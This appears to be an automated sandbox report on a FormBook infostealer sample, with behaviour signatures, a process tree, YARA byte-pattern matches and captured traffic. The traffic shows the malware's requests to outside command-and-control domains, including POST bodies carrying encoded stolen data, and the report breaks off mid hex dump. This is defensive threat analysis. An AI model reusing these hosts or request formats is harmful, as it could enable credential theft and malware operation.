
Analysis Report 111.exe

Overview

General Information

Sample Name: 111.exe
Analysis ID: 285531
MD5: 3fd09f6ed3d2a520ce8924040743247f
SHA1: e89fd03bb21bbb0c8d2069ee645e7bdcf22a7120
SHA256: c8c3a7a2e1be4e07f00da05dafab7db5e71dee2bdecf834d94579044bb53acfe


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Hijacks the control flow in another process
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 111.exe (PID: 4168 cmdline: 'C:\Users\user\Desktop\111.exe' MD5: 3FD09F6ED3D2A520CE8924040743247F)
    • rundll32.exe (PID: 4160 cmdline: rundll32.exe EncoreSlipway,Breathing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 4828 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • autoconv.exe (PID: 776 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
          • cmd.exe (PID: 4692 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • cmd.exe (PID: 6104 cmdline: /c del 'C:\Windows\SysWOW64\cmd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • t4nhyl7po.exe (PID: 1356 cmdline: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings

Source: 00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x18349:$sqlite3step: 68 34 1C 7B E1
  • 0x1845c:$sqlite3step: 68 34 1C 7B E1
  • 0x18378:$sqlite3text: 68 38 2A 90 C5
  • 0x1849d:$sqlite3text: 68 38 2A 90 C5
  • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings

Source: 2.2.cmd.exe.400000.0.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 2.2.cmd.exe.400000.0.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 2.2.cmd.exe.400000.0.unpack
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x17549:$sqlite3step: 68 34 1C 7B E1
  • 0x1765c:$sqlite3step: 68 34 1C 7B E1
  • 0x17578:$sqlite3text: 68 38 2A 90 C5
  • 0x1769d:$sqlite3text: 68 38 2A 90 C5
  • 0x1758b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x176b3:$sqlite3blob: 68 53 D8 7F 8C

Source: 2.2.cmd.exe.400000.0.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 2.2.cmd.exe.400000.0.raw.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: www.glowtey.com | Virustotal: Detection: 7%
Source: http://www.glowtey.com | Virustotal: Detection: 7%
Source: http://www.glowtey.com/c233/ | Virustotal: Detection: 6%
Yara detected FormBook
Source: Yara match | File source: 00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.724195917.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.248756113.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.249334557.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.249408055.0000000003320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: 111.exe | Joe Sandbox ML: detected
Source: 2.2.cmd.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\111.exe | Code function: 0_2_00402765 FindFirstFileA | 0_2_00402765
Source: C:\Users\user\Desktop\111.exe | Code function: 0_2_00406469 FindFirstFileA,FindClose | 0_2_00406469
Source: C:\Users\user\Desktop\111.exe | Code function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose | 0_2_0040592E
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011E31DC FindFirstFileW,FindNextFileW,FindClose | 8_2_011E31DC
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011C85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW | 8_2_011C85EA
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011D245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove | 8_2_011D245C
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011CB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose | 8_2_011CB89C
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011D68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose | 8_2_011D68BA
Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe | Code function: 24_2_00E4245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove | 24_2_00E4245C
Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe | Code function: 24_2_00E468BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose | 24_2_00E468BA
Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe | Code function: 24_2_00E3B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose | 24_2_00E3B89C
Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe | Code function: 24_2_00E385EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW | 24_2_00E385EA
Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe | Code function: 24_2_00E531DC FindFirstFileW,FindNextFileW,FindClose | 24_2_00E531DC
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4x nop then pop esi | 2_2_0041721F
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4x nop then pop esi | 2_2_0041728F
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4x nop then pop esi | 2_2_004172AD
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4x nop then pop edi | 2_2_0040E404

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49721
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49747
Source: global traffic | HTTP traffic detected:
  GET /c233/?BZ=LhqLWrh8d&jDHtm=dIUL4aEnqVztNkxGFBfGGDue4kuBNJsB41nCN9+lFBZzP9N/eKcd9EC4aoHiD0dIecD5 HTTP/1.1
  Host: www.lumenhealthandwellness.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /c233/?jDHtm=Vp47q3jWYtxCpR5shwdOI9jgrSmWH0DOE+Ng17hSC+D0xjvv9TnN74PiV/E2XVvfy3Xi&BZ=LhqLWrh8d HTTP/1.1
  Host: www.affilexample6.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /c233/?jDHtm=rdruXmMsrmfjr75N4q96R5zwpwpkQvpMYoXExK0gOkKL6uUWfKzmipBUu891EQIUthqV&BZ=LhqLWrh8d HTTP/1.1
  Host: www.rupanaa.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /c233/?BZ=LhqLWrh8d&jDHtm=s9hIiY7EReOz2YwSLEQgOYezP1CImGsGkvwaaSfHWOStV9vruWPCpNUbWVdjWjx9llcz HTTP/1.1
  Host: www.henesymarte.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /c233/?BZ=LhqLWrh8d&jDHtm=P8W3Nhn/1wjuMbzQba9+Xkz0GoP3aEAwMmdFYv2f3Jxjf1tYZvWbX1Aq0R+IaCaFN+Nd HTTP/1.1
  Host: www.advincicode.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /c233/?jDHtm=clGH/XTlxIJgHxW4vaAZWA4KzODjpt9B0W6pMNoX4XRhNITn5jiOBWXD3dHeyDpJteiJ&BZ=LhqLWrh8d HTTP/1.1
  Host: www.glowtey.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /c233/?BZ=LhqLWrh8d&jDHtm=NoL+4mltcJVtmaVUQntK+GB5xrEZLMxxCS0mBWv5U5hjZvn1kv6Rpm3ggpYoYEtVjIy6 HTTP/1.1
  Host: www.ecoapiaryfarms.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View | IP Address: 34.102.136.180 34.102.136.180
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | ASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: POST /c233/ HTTP/1.1Host: www.affilexample6.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.affilexample6.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.affilexample6.com/c233/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 74 6d 3d 64 4c 30 42 30 51 72 78 57 63 45 7a 31 6d 6b 44 30 55 4e 56 51 59 37 7a 74 42 47 46 47 6e 72 77 64 71 49 78 78 4d 68 35 47 75 4c 6c 38 41 4b 5f 30 78 4b 6b 79 49 7a 69 48 70 41 6d 53 6d 36 4e 6a 53 72 62 55 32 58 44 53 59 6e 49 4b 71 64 5a 79 69 42 41 6e 47 72 45 36 74 55 45 59 30 4c 68 49 77 66 6a 33 45 68 4e 7e 56 51 36 32 56 35 32 53 65 56 4b 65 72 73 42 62 71 6c 49 38 54 31 75 68 42 70 64 4b 33 55 37 5a 30 65 53 67 5f 72 73 74 39 53 51 77 65 4b 4a 36 79 38 53 54 6d 47 41 39 34 6f 73 38 79 7e 4b 45 6c 4e 2d 79 78 48 61 4f 30 58 44 42 6d 6c 42 4d 64 43 70 7a 6a 42 4b 31 48 74 56 48 4c 44 41 4c 58 79 31 41 2d 77 74 4c 48 31 57 38 56 7a 65 42 45 67 72 6f 76 4d 5a 46 4e 31 61 59 42 78 4b 47 75 6e 46 6c 36 6b 6c 63 59 48 78 34 56 67 75 31 45 57 51 34 39 39 39 63 32 39 35 37 44 6c 38 6a 4f 64 76 71 69 6c 33 39 58 54 4d 77 6e 53 62 52 4d 68 74 74 78 54 55 4c 4b 6a 56 6d 76 50 54 68 7a 5a 43 47 32 49 79 79 73 5a 77 53 58 34 57 70 45 31 39 30 68 4f 57 6e 2d 6a 41 58 57 4f 62 58 50 69 45 6f 49 45 69 53 54 6a 75 67 47 78 37 6d 4b 66 73 68 4f 6e 53 51 77 66 4e 61 43 59 6c 28 62 68 62 4e 74 69 5f 41 30 79 67 37 76 59 59 38 58 28 4d 58 4d 47 5a 28 59 6d 63 54 71 33 6c 7a 47 4b 79 69 50 39 64 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
jDHtm=dL0B0QrxWcEz1mkD0UNVQY7ztBGFGnrwdqIxxMh5GuLl8AK_0xKkyIziHpAmSm6NjSrbU2XDSYnIKqdZyiBAnGrE6tUEY0LhIwfj3EhN~VQ62V52SeVKersBbqlI8T1uhBpdK3U7Z0eSg_rst9SQweKJ6y8STmGA94os8y~KElN-yxHaO0XDBmlBMdCpzjBK1HtVHLDALXy1A-wtLH1W8VzeBEgrovMZFN1aYBxKGunFl6klcYHx4Vgu1EWQ4999c2957Dl8jOdvqil39XTMwnSbRMhttxTULKjVmvPThzZCG2IyysZwSX4WpE190hOWn-jAXWObXPiEoIEiSTjugGx7mKfshOnSQwfNaCYl(bhbNti_A0yg7vYY8X(MXMGZ(YmcTq3lzGKyiP9dAg).
          Source: global trafficHTTP traffic detected: POST /c233/ HTTP/1.1Host: www.affilexample6.comConnection: closeContent-Length: 185415Cache-Control: no-cacheOrigin: http://www.affilexample6.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.affilexample6.com/c233/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 74 6d 3d 64 4c 30 42 30 52 54 6c 46 61 5a 72 78 51 4d 43 37 6b 63 59 55 5a 4c 6c 38 54 53 61 53 45 36 4a 42 49 4d 62 78 4d 78 39 54 62 58 4a 37 67 36 5f 79 79 69 6a 78 59 7a 6a 58 5a 41 70 45 57 48 36 71 68 72 54 55 33 53 6b 53 59 76 50 66 35 31 63 38 53 41 57 6d 6d 6e 34 79 4e 70 51 59 32 75 4a 4c 53 54 46 79 46 64 4e 36 6c 49 30 79 30 70 68 46 76 70 46 51 36 55 41 49 72 4d 4c 37 67 41 58 6e 6a 56 72 4e 32 49 35 55 6e 43 46 76 63 69 35 37 4f 43 6c 30 4f 65 43 35 31 55 4e 4e 78 57 4d 38 36 51 6b 35 7a 7e 56 4b 31 6c 67 6b 68 58 53 59 6c 6a 55 44 56 74 37 4d 63 61 54 35 32 4a 62 69 52 31 4e 46 2d 7a 36 66 31 65 33 45 50 77 31 50 46 64 64 7e 57 72 78 5a 41 6c 75 37 50 68 62 41 50 39 73 62 67 35 78 45 61 33 42 39 62 56 51 52 72 71 39 77 30 77 42 28 6d 32 48 6a 2d 46 31 62 77 74 54 31 44 6c 58 6c 4f 64 5a 7e 79 45 49 77 45 28 58 67 33 69 6d 53 4e 70 2d 75 69 48 50 4d 49 58 5a 69 4f 6e 4f 6b 44 6c 65 49 6e 34 67 32 4b 68 6e 45 52 63 79 71 45 31 6d 30 69 6d 4e 6e 2d 6a 36 58 58 4f 39 57 36 4b 45 71 59 6b 78 53 77 62 63 70 6d 78 71 6e 62 76 75 71 64 7a 34 51 77 48 4e 62 32 51 66 39 73 39 62 4a 2d 71 2d 41 56 79 67 39 66 59 59 70 48 7e 6a 5a 5a 76 49 30 37 57 6a 61 35 65 61 73 6d 71 67 6d 2d 51 4b 45 30 41 6d 55 41 35 6a 6b 47 62 31 33 55 44 79 34 70 75 36 41 66 4a 54 57 57 71 74 31 7a 49 6f 74 30 32 51 78 37 7a 61 63 5f 68 39 6c 50 73 2d 71 69 77 6a 62 41 72 4c 77 54 4c 70 7a 64 7a 78 34 4b 78 4f 4d 38 65 56 4c 35 64 48 30 54 6b 77 36 31 50 62 59 74 78 70 7a 34 62 56 52 32 56 4c 48 34 51 65 58 41 73 4b 62 64 53 30 6c 68 79 
54 71 35 57 77 49 2d 50 79 7e 52 53 6b 42 47 77 78 57 49 5a 58 41 67 7e 32 42 6b 7e 74 61 6d 67 78 57 31 33 67 32 4c 6e 38 38 6c 53 6c 72 6f 38 4f 33 42 64 43 67 67 48 51 77 48 65 6f 5a 66 74 6e 42 4d 65 49 44 48 61 54 64 4a 67 58 51 44 56 46 6d 39 38 4d 57 4d 65 74 76 32 48 75 32 59 33 6b 7e 6b 52 42 66 53 58 32 37 64 41 77 4c 4d 53 69 69 78 6c 4f 6b 6d 34 46 34 4d 47 4a 4d 63 64 68 48 4a 38 73 54 6f 59 58 68 73 69 34 32 2d 59 4a 35 56 34 61 42 44 64 30 58 32 71 4c 36 6b 39 34 45 52 69 5f 7a 63 41 4b 67 39 4c 30 74 5a 6c 56 62 37 44 6d 7a 68 45 7a 5a 35 77 52 4c 45 55 6d 7a 72 62 30 33 64 74 6d 7a 6f 55 57 44 4d 57 4c 50 47 6e 43 67 4d 28 57 53 32 67 68 6c 6f 37 32 6d 32 55 55 33 37 66 6c 38 36 78 4b 77 46 39 55 5a 54 6c 6e 44 4f 51 56 4f 70 59 52 35 56 69 34 7a 4d 6f 42 64 55 57 42 39 5a 37 56 7e 51 55 79 43 54 7a 61 50 2d 47 63 34 74 73 4a 51 77 33 71 4b 33 7a 69 6c 47 70 4f 34 79 65 59 54 36 59 56 37 66 4c 4d 6b 46 30 49 55 50 39 6b 30 63 45 39 77 6e 41 54 74 64 4a 69 55 5f 73 45 74 48 32 4a 65 4f 65 56 61 34 68
          Source: global trafficHTTP traffic detected: POST /c233/ HTTP/1.1Host: www.rupanaa.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.rupanaa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rupanaa.com/c233/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 74 6d 3d 6a 5f 6e 55 4a 47 77 66 68 46 54 69 7a 36 45 43 6f 66 49 4d 44 4d 6a 58 76 6c 52 77 47 50 34 4c 4a 73 43 5f 69 74 38 6a 48 48 53 31 28 5f 41 67 52 71 75 56 6b 4a 4d 71 74 4e 6c 70 45 41 6f 36 36 56 72 61 42 4a 4e 31 65 48 73 4f 57 4f 47 44 56 41 69 58 47 4c 4e 50 71 7a 6b 6b 66 4d 6c 55 32 44 43 35 65 79 28 6a 67 4f 31 4f 68 5a 45 52 4b 7a 54 69 74 4c 66 6d 55 73 45 34 44 76 4d 56 6b 58 4b 74 59 64 4f 50 56 77 43 73 39 65 69 7a 77 41 6c 47 34 2d 4a 63 70 63 75 50 67 7a 36 42 73 79 77 37 59 54 52 67 76 46 4c 62 54 57 6f 7a 50 47 52 44 33 49 67 55 52 74 7e 4a 28 71 59 62 53 51 4b 6f 4a 57 69 67 41 66 6c 4f 4d 36 76 69 6b 4c 6a 4d 50 5a 74 6b 63 56 48 33 57 75 66 5a 64 34 33 37 74 6c 74 4d 50 57 6b 50 53 36 78 67 64 52 30 34 68 61 4a 4b 51 71 56 43 47 46 4b 6e 37 62 4f 44 39 6f 6b 4b 73 76 35 76 57 35 32 31 33 42 47 68 6e 34 28 78 4d 46 79 67 4d 54 48 45 61 34 68 44 66 31 6c 32 61 4b 46 37 47 6e 50 33 47 76 63 73 72 33 28 6b 79 45 32 6c 57 54 44 57 52 68 50 32 42 51 7a 67 4b 66 7e 41 75 55 66 4e 51 65 61 2d 34 75 7e 37 44 54 71 4f 45 77 76 47 37 70 30 6e 44 78 33 67 6c 38 6e 4c 43 79 65 32 4c 6d 59 37 50 4e 6c 33 66 54 6e 6e 78 49 33 54 6e 31 48 36 38 41 46 39 6b 4d 65 33 42 68 55 72 75 67 29 2e 00 63 54 71 33 6c 7a 47 Data Ascii: 
jDHtm=j_nUJGwfhFTiz6ECofIMDMjXvlRwGP4LJsC_it8jHHS1(_AgRquVkJMqtNlpEAo66VraBJN1eHsOWOGDVAiXGLNPqzkkfMlU2DC5ey(jgO1OhZERKzTitLfmUsE4DvMVkXKtYdOPVwCs9eizwAlG4-JcpcuPgz6Bsyw7YTRgvFLbTWozPGRD3IgURt~J(qYbSQKoJWigAflOM6vikLjMPZtkcVH3WufZd437tltMPWkPS6xgdR04haJKQqVCGFKn7bOD9okKsv5vW5213BGhn4(xMFygMTHEa4hDf1l2aKF7GnP3Gvcsr3(kyE2lWTDWRhP2BQzgKf~AuUfNQea-4u~7DTqOEwvG7p0nDx3gl8nLCye2LmY7PNl3fTnnxI3Tn1H68AF9kMe3BhUrug).cTq3lzG
          Source: global trafficHTTP traffic detected: POST /c233/ HTTP/1.1Host: www.rupanaa.comConnection: closeContent-Length: 185415Cache-Control: no-cacheOrigin: http://www.rupanaa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rupanaa.com/c233/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 74 6d 3d 6a 5f 6e 55 4a 43 73 4c 6e 31 58 7a 33 4d 38 48 6f 50 59 79 48 4e 53 51 7e 79 6f 30 51 4e 35 79 4b 2d 47 56 69 74 73 6e 65 32 43 6a 31 2d 51 67 58 76 36 65 77 35 4d 70 36 64 6c 75 41 41 6c 44 33 6e 71 58 42 49 5a 4c 65 48 6b 50 59 74 65 4b 56 51 69 41 47 72 42 7a 39 6e 4e 34 66 4e 56 78 32 6e 6e 71 62 79 44 6a 74 65 4e 4d 6b 34 56 44 50 79 66 6e 71 4c 44 70 57 75 46 6f 44 64 4a 38 6b 79 71 62 51 39 7e 4e 43 78 47 37 68 4e 37 65 6a 42 74 64 79 50 35 52 33 72 4f 51 75 30 53 4e 74 33 51 4e 58 79 52 6a 6e 55 6a 5a 59 46 41 56 66 6a 78 51 31 59 52 6e 52 71 71 7a 79 5f 52 56 42 48 71 77 4d 6d 43 4b 59 62 39 49 4f 49 48 71 7a 59 47 36 41 35 39 4c 65 52 4c 77 54 2d 7a 49 65 36 28 72 6a 67 42 33 44 48 59 44 5a 75 31 59 51 69 59 77 7e 4b 5a 31 61 4c 64 52 49 78 7e 5f 38 59 28 67 35 49 6c 73 71 66 35 6a 64 61 75 6b 7a 7a 71 2d 69 37 58 49 42 6d 6a 36 4d 41 7a 62 5a 39 34 63 52 33 56 6e 